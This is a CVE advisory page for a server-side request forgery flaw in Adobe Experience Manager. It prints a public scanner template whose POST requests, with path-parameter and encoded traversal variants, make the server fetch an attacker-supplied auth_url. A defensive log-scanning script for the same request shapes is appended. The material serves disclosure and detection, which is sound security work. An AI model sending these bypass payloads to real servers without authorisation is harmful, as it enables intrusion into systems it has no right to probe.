CVE-2025-54249: Adobe Experience Manager ≤ 6.5.23.0 – SSRF

Date: 2025-08-01 | Affected software: Adobe Experience Manager | PoC: public

Vulnerability description

Adobe Experience Manager versions 6.5.23.0 and earlier are affected by a Server-Side Request Forgery (SSRF) vulnerability that could result in a security feature bypass.

PoC code [public]

id: CVE-2025-54249

info:
  name: Adobe Experience Manager ≤ 6.5.23.0 – SSRF
  author: DhiyaneshDk,assetnote
  severity: medium
  description: |
    Adobe Experience Manager versions 6.5.23.0 and earlier are affected by a Server-Side Request Forgery (SSRF) vulnerability that could result in a Security feature bypass
  reference:
    - https://github.com/assetnote/hopgoblin/blob/main/hopgoblin.py
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54251
    - https://helpx.adobe.com/security/products/experience-manager/apsb25-90.html
  metadata:
    verified: true
    max-request: 6
    vendor: adobe
    product: experience_manager
    fofa-query: body="/libs/granite/core/content/login.html"
  tags: cve,2025,adobe,aem,ssrf,oast,oob,vkev,vuln

http:
  - raw:
      - |
        POST /services/accesstoken/verify;x='.pdf/x' HTTP/1.1
        Host: {{Hostname}}
        User-Agent: hopgoblin/1.0
        Accept-Encoding: gzip, deflate, br
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Connection: keep-alive
        Cache-Control: max-age=0
        Sec-Ch-Ua: "Google Chrome";v="139", "Not=A?Brand";v="8", "Chromium";v="139"
        Sec-Ch-Ua-Mobile: ?0
        Sec-Ch-Ua-Platform: "macOS"
        Accept-Language: en-US;q=0.9,en;q=0.8
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: navigate
        Sec-Fetch-User: ?1
        Sec-Fetch-Dest: document
        Content-Type: application/x-www-form-urlencoded

        auth_url=https%3A%2F%2F{{interactsh-url}}

    payloads:
      path:
        - "/services/accesstoken/verify;x='.pdf/x'"
        - "/services/accesstoken/verify;x='.ico/x'"
        - "/services/accesstoken/verify;x='.html/x'"
        - "/services/accesstoken/verify;x='.css/x'"
        - "/services/accesstoken/verify;x='x/graphql/execute/json/x'"
        - "/graphql/execute.json/..%2F../services/accesstoken/verify"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_any(body,'<html')"
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "http"

    extractors:
      - type: dsl
        dsl:
          - 'interactsh_protocol'
          - 'interactsh_request'
# digest: 4a0a00473045022039d2939b84185aa28e0b4990e599da188e4808a6af813171d4a54dfd742622550221009b8815b355e4a9eff046714a979ddb115363e90de10330ec6f0e436c3f6f76ae:922c64590222798bb761d5b6d8e72950
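
A defender-side check for the request shapes this template sends, as an added example (not part of the original page or of the template's project): it scans web access logs for requests that reach `/services/accesstoken/verify` either directly or through the `;x=` path-parameter and `..%2F` forms listed under `payloads`. The canonicalisation is a heuristic assumption, not the exact resolution AEM or the dispatcher performs, and the log lines are constructed.

```python
import re
from posixpath import normpath
from urllib.parse import unquote

TARGET = "/services/accesstoken/verify"  # endpoint requested by the template above
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines in combined log format
    '192.0.2.10 - - [01/Aug/2025:10:00:01 +0000] "GET /content/site/en.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Aug/2025:10:00:02 +0000] "POST /services/accesstoken/verify;x=\'.pdf/x\' HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Aug/2025:10:00:03 +0000] "POST /graphql/execute.json/..%2F../services/accesstoken/verify HTTP/1.1" 200 312',
    '192.0.2.10 - - [01/Aug/2025:10:00:04 +0000] "GET /services/accesstokenizer/info HTTP/1.1" 404 0',
]

def canonical(raw_path):
    """Heuristic canonical form (an assumption): drop the query string, percent-decode
    twice (covers double encoding), strip ';' parameters per segment, resolve dot segments."""
    path = raw_path.split("?", 1)[0]
    for _ in range(2):
        path = unquote(path)
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    return normpath("/" + "/".join(s for s in segments if s))

def classify(raw_path):
    """Return 'direct', 'disguised' or None for one request path."""
    if raw_path.split("?", 1)[0] == TARGET:
        return "direct"
    canon = canonical(raw_path)
    if canon == TARGET or canon.startswith(TARGET + "/"):
        return "disguised"  # reaches the endpoint, but the raw path hides it
    return None

def scan(lines):
    """Return (line_number, method, kind, raw_path) for every matching request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            kind = classify(match["path"])
            if kind:
                hits.append((number, match["method"], kind, match["path"]))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit is a lead for review rather than proof of exploitation; correlating it with outbound connections from the AEM host at the same time confirms whether the server actually fetched a supplied `auth_url`.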
